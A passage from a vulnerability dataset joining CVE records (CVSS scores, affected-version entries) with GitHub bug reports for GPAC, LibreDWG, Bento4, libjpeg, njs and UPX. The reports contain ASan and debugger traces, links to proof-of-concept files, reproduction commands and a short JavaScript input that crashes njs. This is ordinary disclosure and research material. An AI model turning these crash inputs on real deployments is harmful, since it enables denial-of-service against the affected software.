fa fa[fa]fa fa fa fa fa fa fa fa fa 0x0c1e7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2235126==ABORTING ``` **source code** ``` 2481 GF_DOVIDecoderConfigurationRecord *gf_isom_dovi_config_get(GF_ISOFile* the_file, u32 trackNumber, u32 DescriptionIndex) 2482 { 2483 GF_TrackBox* trak; 2484 GF_MPEGVisualSampleEntryBox *entry; 2485 trak = gf_isom_get_track_from_file(the_file, trackNumber); 2486 if (!trak || !trak->Media || !DescriptionIndex) return NULL; 2487 entry = (GF_MPEGVisualSampleEntryBox*)gf_list_get(trak->Media->information->sampleTable->SampleDescription->child_boxes, DescriptionIndex - 1); 2488 if (!entry) return NULL; 2489 if (entry->internal_type != GF_ISOM_SAMPLE_ENTRY_VIDEO) return NULL; 2490 if (!entry->dovi_config) return NULL; /**here**/ 2491 return DOVI_DuplicateConfig(&entry->dovi_config->DOVIConfig); 2492 } ``` **sample poc:** [poc1.zip](https://github.com/gpac/gpac/files/9038477/poc1.zip) ps: it is similar with the issue which occured in older gpac version ( https://github.com/gpac/gpac/issues/1846) . The bug was not patched . It still occured in the newest version.
heap-buffer-overflow in function gf_isom_dovi_config_get
https://api.github.com/repos/gpac/gpac/issues/2218/comments
0
2022-07-04T10:10:00Z
2022-07-12T17:13:10Z
https://github.com/gpac/gpac/issues/2218
1,292,941,893
2,218
CVE-2022-35164
2022-08-18T05:15:07.603
LibreDWG v0.12.4.4608 & commit f2dea29 was discovered to contain a heap use-after-free via bit_copy_chain.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/497" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "0A8152A2-6867-4B31-8F47-A1A655A49EFF", "versionEndExcluding": "0.12.4.4608", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/497
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
# Vulnerability description version: [0.12.4.4608](https://github.com/LibreDWG/libredwg/releases/tag/0.12.4.4608) & latest commit [f2dea29](https://github.com/LibreDWG/libredwg/commit/f2dea296a0a3bb16afdae8d2ca16749a617a4383) poc: [poc](https://github.com/0xdd96/PoC/raw/main/libredwg/UAF-bit_copy_chain) command: ./dwgrewrite poc **_This is similar to issue #364 and others, but it seems that the patch https://github.com/LibreDWG/libredwg/commit/e95cc1eea8744c40e298208679eda14039b9b5d3 has not fully fixed them._** Here is the trace reported by ASAN: ``` ==28024==ERROR: AddressSanitizer: heap-use-after-free on address 0x7ffff3b65800 at pc 0x5555564f67f6 bp 0x7fffffff6760 sp 0x7fffffff6750 READ of size 1 at 0x7ffff3b65800 thread T0 #0 0x5555564f67f5 in bit_read_RC libredwg/src/bits.c:317 #1 0x5555564f67f5 in bit_copy_chain libredwg/src/bits.c:3352 #2 0x555556105ec6 in obj_flush_hdlstream libredwg/src/encode.c:833 #3 0x555556105ec6 in dwg_encode_PLANESURFACE_private libredwg/src/dwg.spec:9150 #4 0x5555563a57df in dwg_encode_PLANESURFACE libredwg/src/dwg.spec:9136 #5 0x5555563a57df in dwg_encode_variable_type libredwg/src/classes.inc:247 #6 0x5555563ab3d0 in dwg_encode_add_object libredwg/src/encode.c:4432 #7 0x5555563c914c in dwg_encode libredwg/src/encode.c:2769 #8 0x55555575ca00 in dwg_write_file libredwg/src/dwg.c:429 #9 0x555555758a3f in main libredwg/programs/dwgrewrite.c:350 #10 0x7ffff726f0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) #11 0x55555575924d in _start (libredwg/build-ASAN/dwgrewrite+0x20524d) 0x7ffff3b65800 is located 0 bytes inside of 208896-byte region [0x7ffff3b65800,0x7ffff3b98800) freed by thread T0 here: #0 0x7ffff7699ffe in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dffe) #1 0x5555564f532c in bit_chain_alloc_size libredwg/src/bits.c:3046 #2 0x5555564f532c in bit_chain_alloc libredwg/src/bits.c:3062 #3 0x5555564f532c in bit_copy_chain libredwg/src/bits.c:3339 #4 0x1900000105 (<unknown module>) previously allocated by thread T0 here: #0 0x7ffff7699ffe in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dffe) #1 0x5555564f396f in bit_chain_alloc_size libredwg/src/bits.c:3046 #2 0x5555564f396f in bit_chain_alloc libredwg/src/bits.c:3062 #3 0x31fff (<unknown module>) ``` # Vulnerability analysis When running to `bit_copy_chain`, both `dat->chain` and `tmp_dat->chain` point to `0x7ffff3b65800` (see the gdb output below). This will lead to use-after-free, since line 3339 calls `realloc`, which frees the chunk `0x7ffff3b65800`, and line 3352 ties to read from the freed chunk. Also note that the comment says `bit_copy_chain` *Copy the whole content of tmp_data to dat, and reset tmp_dat*, so why `dat->chain = tmp_dat->chain` in this PoC should be further investigated. https://github.com/LibreDWG/libredwg/blob/f2dea296a0a3bb16afdae8d2ca16749a617a4383/src/bits.c#L3333-L3360 ``` pwndbg> p *dat $6 = { chain = 0x7ffff3b65800, size = 208896, byte = 204890, bit = 6 '\006', opts = 1 '\001', version = R_2000, from_version = R_2004, fh = 0x0 } pwndbg> p *tmp_dat $10 = { chain = 0x7ffff3b65800, size = 208896, byte = 204882, bit = 6 '\006', opts = 1 '\001', version = R_2000, from_version = R_2004, fh = 0x0 } ```
Heap use-after-free still exists in the bit_copy_chain
https://api.github.com/repos/LibreDWG/libredwg/issues/497/comments
2
2022-06-17T12:04:26Z
2023-06-27T10:19:27Z
https://github.com/LibreDWG/libredwg/issues/497
1,274,949,181
497
CVE-2022-35165
2022-08-18T05:15:07.657
An issue in AP4_SgpdAtom::AP4_SgpdAtom() of Bento4-1.6.0-639 allows attackers to cause a Denial of Service (DoS) via a crafted mp4 input.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/712
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
# Vulnerability description **version:** Bento4-1.6.0-639 **command:** ./mp42aac $POC /dev/null **Download:** [poc](https://github.com/0xdd96/PoC/raw/main/Bento4/AP4_SgpdAtom::AP4_SgpdAtom-out-of-memory) Here is the trace reported by ASAN: ``` $ mp42aac poc /dev/null AddressSanitizer: Out of memory. The process has exhausted 65536MB for size class 48. ================================================================= ==29843==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x18 bytes #0 0x7ffff769b947 in operator new(unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10f947) #1 0x555555911f52 in AP4_List<AP4_DataBuffer>::Add(AP4_DataBuffer*) /path_to_Bento4/Source/C++/Core/Ap4List.h:160 #2 0x5555559114bd in AP4_SgpdAtom::AP4_SgpdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /path_to_Bento4/Source/C++/Core/Ap4SgpdAtom.cpp:111 #3 0x555555910da4 in AP4_SgpdAtom::Create(unsigned int, AP4_ByteStream&) /path_to_Bento4/Source/C++/Core/Ap4SgpdAtom.cpp:54 #4 0x55555589399c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:729 #5 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233 #6 0x5555558b9c5f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #7 0x5555558b96c2 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #8 0x5555558b9229 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #9 0x555555893d26 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:796 #10 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233 #11 0x5555558c7b47 in AP4_DrefAtom::AP4_DrefAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4DrefAtom.cpp:84 #12 0x5555558c768b in AP4_DrefAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4DrefAtom.cpp:50 #13 0x555555892ccd in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:560 #14 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233 #15 0x5555558b9c5f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #16 0x5555558b96c2 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #17 0x5555558b9229 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #18 0x555555893d26 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:796 #19 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233 #20 0x5555558b9c5f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #21 0x5555558b96c2 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #22 0x5555558b9229 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #23 0x555555893d26 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:796 #24 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233 #25 0x5555558b9c5f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #26 0x5555558b96c2 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #27 0x5555558b9229 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #28 0x555555893d26 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:796 #29 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233 ==29843==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory (/lib/x86_64-linux-gnu/libasan.so.5+0x10f947) in operator new(unsigned long) ==29843==ABORTING ``` # Vulnerability analysis https://github.com/axiomatic-systems/Bento4/blob/0735fe81819fd5f6501e6649b6e0d4b2b7874d8f/Source/C%2B%2B/Core/Ap4SgpdAtom.cpp#L89-L114 ``` pwndbg> p entry_count $1 = 4278190081 pwndbg> p m_DefaultLength $2 = 20 pwndbg> p m_Version $3 = 1 '\001' pwndbg> p bytes_available $4 = 20 ``` The possible cause of this issue is that a crafted input can set `entry_count` to a large value (4,278,190,081) in line 90. Such a long loop (line 95-114) will allocate a lot of memory in line 106 and line 111, which eventually exhausts the memory. Since the return value of `stream.Read` is not checked in line 109, the loop will not terminate at the end of the input file.
Possible memory exhuastion in AP4_SgpdAtom::AP4_SgpdAtom(). The process has exhausted 65536MB memory.
https://api.github.com/repos/axiomatic-systems/Bento4/issues/712/comments
0
2022-05-31T14:44:43Z
2022-06-04T17:16:23Z
https://github.com/axiomatic-systems/Bento4/issues/712
1,253,977,287
712
CVE-2022-35166
2022-08-18T05:15:07.700
libjpeg commit 842c7ba was discovered to contain an infinite loop via the component JPEG::ReadInternal.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/76" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpeg:libjpeg:2022-06-15:*:*:*:*:*:*:*", "matchCriteriaId": "CDECFA58-57FC-4227-A771-A74B47C7C502", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/thorfdbg/libjpeg/issues/76
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thorfdbg", "libjpeg" ]
**version:** latest commit https://github.com/thorfdbg/libjpeg/commit/842c7baef7808f12cad19b49b2efcfa9575dbc78 **poc:** [poc](https://github.com/0xdd96/PoC/raw/main/libjpeg/infinite-loop-ReadInternal) **command:** ./jpeg poc /dev/null Here is the backtrace in GDB: ``` pwndbg> backtrace #0 0x000055555558fa8a in Image::StartParseFrame (this=0x5555557433a0, io=0x555555741ad0) at image.cpp:658 #1 0x0000555555584739 in JPEG::ReadInternal (this=0x5555557414b8, tags=0x7fffffffdcf0) at jpeg.cpp:286 #2 0x00005555555843de in JPEG::Read (this=0x5555557414b8, tags=0x7fffffffdcf0) at jpeg.cpp:210 #3 0x000055555557a23e in Reconstruct (infile=0x7fffffffe6cf "../../script/test-libjpeg/modify8", outfile=0x7fffffffe6f1 "/dev/null", colortrafo=1, alpha=0x0, upsample=true) at reconstruct.cpp:121 #4 0x00005555555715be in main (argc=3, argv=0x7fffffffe448) at main.cpp:747 #5 0x00007ffff7abf0b3 in __libc_start_main (main=0x55555556fac1 <main(int, char**)>, argc=3, argv=0x7fffffffe448, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe438) at ../csu/libc-start.c:308 #6 0x000055555556f5ee in _start () ``` When `marker==0xffd9`, `ParseFrameHeader` will return `NULL` (line 627, image.cpp), which initializes `m_pCurrent` with `NULL` (line 667, image.cpp). https://github.com/thorfdbg/libjpeg/blob/842c7baef7808f12cad19b49b2efcfa9575dbc78/codestream/image.cpp#L621-L627 https://github.com/thorfdbg/libjpeg/blob/842c7baef7808f12cad19b49b2efcfa9575dbc78/codestream/image.cpp#L657-L678 Since `m_bReceivedFrameHeadere` is set to `true` after that (lne 672, image.cpp), further calls to `StartParseFrame` will keep returning `m_pCurreent=NULL`. https://github.com/thorfdbg/libjpeg/blob/842c7baef7808f12cad19b49b2efcfa9575dbc78/interface/jpeg.cpp#L284-L353 Such behavior leads to an infinite loop in `JPEG::ReadInternal`. When `m_pFrame==NULL` (line 285, jpeg.cpp), it will invoke `m_pImage->StartParseFrame` to initialize it (line 286, jpeg.cpp). Since `StartParseFrame` keeps returning `NULL` in this case, the while loop from line 284-353 cannot terminate.
Infinite loop in JPEG::ReadInternal
https://api.github.com/repos/thorfdbg/libjpeg/issues/76/comments
1
2022-06-26T04:17:35Z
2022-06-27T18:59:25Z
https://github.com/thorfdbg/libjpeg/issues/76
1,284,796,852
76
CVE-2022-35173
2022-08-18T06:15:07.280
An issue was discovered in Nginx NJS v0.7.5. The JUMP offset for a break instruction was not set to a correct offset during code generation, leading to a segmentation violation.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "http://hg.nginx.org/njs/rev/b7c4e0f714a9" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/commit/404553896792b8f5f429dc8852d15784a59d8d3e" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/553" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nginx:njs:0.7.5:*:*:*:*:*:*:*", "matchCriteriaId": "AFF53793-2148-4A4F-AA75-6D9B959E9B7A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/nginx/njs/issues/553
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
Hi, the following PoC triggers a crash (related to string fmt?) in the latest commit. ```js (function() { while ([]) try { break try { return } catch (a) {} } catch (b) {} }()) ``` Environment: ``` Commit: e008f7ae22834ff1173b7a0067b14c821102018d System: Ubuntu 18.04.6 LTS ``` ASan output: ``` /njs/njs_asan/build/njs ./poc.js AddressSanitizer:DEADLYSIGNAL ================================================================= ==177164==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000803 (pc 0x7ffff6807384 bp 0x7fffffffb790 sp 0x7fffffffaf48 T0) ==177164==The signal is caused by a READ memory access. ==177164==Hint: address points to the zero page. #0 0x7ffff6807384 (/lib/x86_64-linux-gnu/libc.so.6+0xbb384) #1 0x497d01 in __asan_memcpy (/njs/njs_asan/build/njs+0x497d01) #2 0x4d2b96 in njs_vsprintf /njs/njs_asan/src/njs_sprintf.c:424:19 #3 0x541fe6 in njs_error_fmt_new /njs/njs_asan/src/njs_error.c:69:13 #4 0x4ea1a7 in njs_vmcode_error /njs/njs_asan/src/njs_vmcode.c #5 0x4e1c7e in njs_vmcode_interpreter /njs/njs_asan/src/njs_vmcode.c:993:17 #6 0x52dcdf in njs_function_lambda_call /njs/njs_asan/src/njs_function.c:693:11 #7 0x52d6d0 in njs_function_frame_invoke /njs/njs_asan/src/njs_function.c:780:16 #8 0x4e39ec in njs_vmcode_interpreter /njs/njs_asan/src/njs_vmcode.c:799:23 #9 0x4ddf17 in njs_vm_start /njs/njs_asan/src/njs_vm.c:539:11 #10 0x4cb35b in njs_process_script /njs/njs_asan/src/njs_shell.c:890:19 #11 0x4cbb68 in njs_process_file /njs/njs_asan/src/njs_shell.c:619:11 #12 0x4ca1fc in main /njs/njs_asan/src/njs_shell.c:303:15 #13 0x7ffff676dc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #14 0x41d9a9 in _start (/njs/njs_asan/build/njs+0x41d9a9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb384) ==177164==ABORTING ```
SEGV in njs_sprintf.c:424:19
https://api.github.com/repos/nginx/njs/issues/553/comments
0
2022-06-20T21:18:10Z
2024-07-20T00:35:11Z
https://github.com/nginx/njs/issues/553
1,277,395,914
553
CVE-2020-27787
2022-08-18T19:15:14.210
A Segmentaation fault was found in UPX in invert_pt_dynamic() function in p_lx_elf.cpp. An attacker with a crafted input file allows invalid memory address access that could lead to a denial of service.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/commit/e2f60adc95334f47e286838dac33160819c5d74d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/333" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*", "matchCriteriaId": "2A4A2432-18AE-4B27-A527-030DD9D34F93", "versionEndExcluding": "3.96", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/upx/upx/issues/333
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
## Environment A crafted input will lead to crash in p_lx_elf.cpp at UPX 3.96(latest version,git clone from branch devel) upx 3.96-git-1bb93d4fce9f+ UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2020 Laszlo Molnar Copyright (C) 2000-2020 John F. Reiser Copyright (C) 2002-2020 Jens Medoch Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov Triggered by ./upx.out -d -f -o foo ../../upx_poc2 --info OS: Ubuntu 16.04.6 LTS CPU architecture: x86_64 ## POC [poc](https://github.com/cxy20103657/software_poc/blob/master/upx_poc2) ## Problem The debug information is as follows: open BUILD_TYPE_DEBUG ?= 1 BUILD_TYPE_SANITIZE ?= 1 root@ubuntu:/home/upx_tc/upx_debug_2/src# ./upx.out -d -f -o foo ../../upx_poc2 --info Ultimate Packer for eXecutables Copyright (C) 1996 - 2020 UPX git-1bb93d+ Markus Oberhumer, Laszlo Molnar & John Reiser Jan 12th 2020 File size Ratio Format Name -------------------- ------ ----------- ----------- #ASAN:SIGSEGV ================================================================= ==11637==ERROR: AddressSanitizer: SEGV on unknown address 0x632000014810 (pc 0x00000087d00d bp 0x7ffedceeaf20 sp 0x7ffedceeaef0 T0) #0 0x87d00c in acc_ua_get_le64(void const*) /home/upx_tc/upx_debug_2/src/miniacc.h:6208 #1 0x45eace in get_le64(void const*) /home/upx_tc/upx_debug_2/src/bele.h:184 #2 0x883e8f in N_BELE_RTP::LEPolicy::get64(void const*) const /home/upx_tc/upx_debug_2/src/bele_policy.h:194 #3 0x58d1ff in Packer::get_te64(void const*) const (/home/upx_tc/upx_debug_2/src/upx.out+0x58d1ff) #4 0x5757ce in PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*) /home/upx_tc/upx_debug_2/src/p_lx_elf.cpp:5173 #5 0x5664cc in PackLinuxElf64::unpack(OutputFile*) /home/upx_tc/upx_debug_2/src/p_lx_elf.cpp:4663 #6 0x797e50 in Packer::doUnpack(OutputFile*) /home/upx_tc/upx_debug_2/src/packer.cpp:107 #7 0x7db436 in PackMaster::unpack(OutputFile*) /home/upx_tc/upx_debug_2/src/packmast.cpp:269 #8 0x885565 in do_one_file(char const*, char*) /home/upx_tc/upx_debug_2/src/work.cpp:160 #9 0x8868c2 in do_files(int, int, char**) /home/upx_tc/upx_debug_2/src/work.cpp:271 #10 0x468b28 in main /home/upx_tc/upx_debug_2/src/main.cpp:1539 #11 0x7feefab6482f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #12 0x4030f8 in _start (/home/upx_tc/upx_debug_2/src/upx.out+0x4030f8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/upx_tc/upx_debug_2/src/miniacc.h:6208 acc_ua_get_le64(void const*) ==11637==ABORTING
Segmentation fault in PackLinuxElf64::invert_pt_dynamic at p_lx_elf.cpp:5173
https://api.github.com/repos/upx/upx/issues/333/comments
4
2020-01-14T07:02:22Z
2022-08-18T21:41:23Z
https://github.com/upx/upx/issues/333
549,373,236
333
CVE-2020-27790
2022-08-18T19:15:14.270
A floating point exception issue was discovered in UPX in PackLinuxElf64::invert_pt_dynamic() function of p_lx_elf.cpp file. An attacker with a crafted input file could trigger this issue that could cause a crash leading to a denial of service. The highest impact is to Availability.
